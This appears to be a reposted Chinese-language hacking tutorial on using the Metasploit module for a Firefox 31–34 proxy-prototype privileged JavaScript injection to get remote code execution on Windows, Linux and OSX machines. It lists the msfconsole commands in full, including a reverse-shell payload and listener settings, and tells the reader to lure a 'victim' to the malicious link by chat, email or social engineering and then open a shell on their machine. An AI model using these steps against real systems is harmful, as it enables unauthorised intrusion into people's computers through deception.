使用Firefox代理原型特权JavaScript注入利用远程Windows,Linux,OSX PC

通过滥用XPConnect组件中的错误并获得对特权chrome:// window,此漏洞利用Firefox 31-34上的远程代码执行。此漏洞需要用户单击页面上的任意位置以触发漏洞。
利用目标
Firefox 31到34
Windows 7的
Linux的
的Solaris
OSX
需求
攻击者:kali Linux
受害者PC:Windows 7
打开Kali终端类型  msfconsole
使用Firefox代理原型特权JavaScript注入利用远程Windows,Linux,OSX PC
现在输入  exploit use / multi / browser / firefox_proxy_prototype
msf exploit(firefox_proxy_prototype)> set payload firefox / shell_reverse_tcp
msf exploit(firefox_proxy_prototype)> set lhost 192.168.1.9  (本地主机的IP)
msf exploit(firefox_proxy_prototype)> set srvhost 192.168.1.9
msf exploit(firefox_proxy_prototype)> set uripath /
msf exploit(firefox_proxy_prototype)> exploit
使用Firefox代理原型特权JavaScript注入利用远程Windows,Linux,OSX PC
现在你应该给你的受害者一个URL  http :// 192 168 1 9 8080
通过聊天或电子邮件或任何社会工程技术将服务器的链接发送给受害者
现在,当受害人打开以下链接HTTP :// 192 。168 。1 。9 :8080,如下图所示会话将被打开
使用Firefox代理原型特权JavaScript注入利用远程Windows,Linux,OSX PC
现在键入session -l以显示受害者打开链接时打开的会话
使用Firefox代理原型特权JavaScript注入利用远程Windows,Linux,OSX PC
现在会话已打开类型sysinfo以获取系统信息,然后键入shell进入
受害者命令提示。
使用Firefox代理原型特权JavaScript注入利用远程Windows,Linux,OSX PC
转载请注明本文链接: http://www.mayidui.net/t2414.html
游客
登录后才可以回帖,登录 或者 注册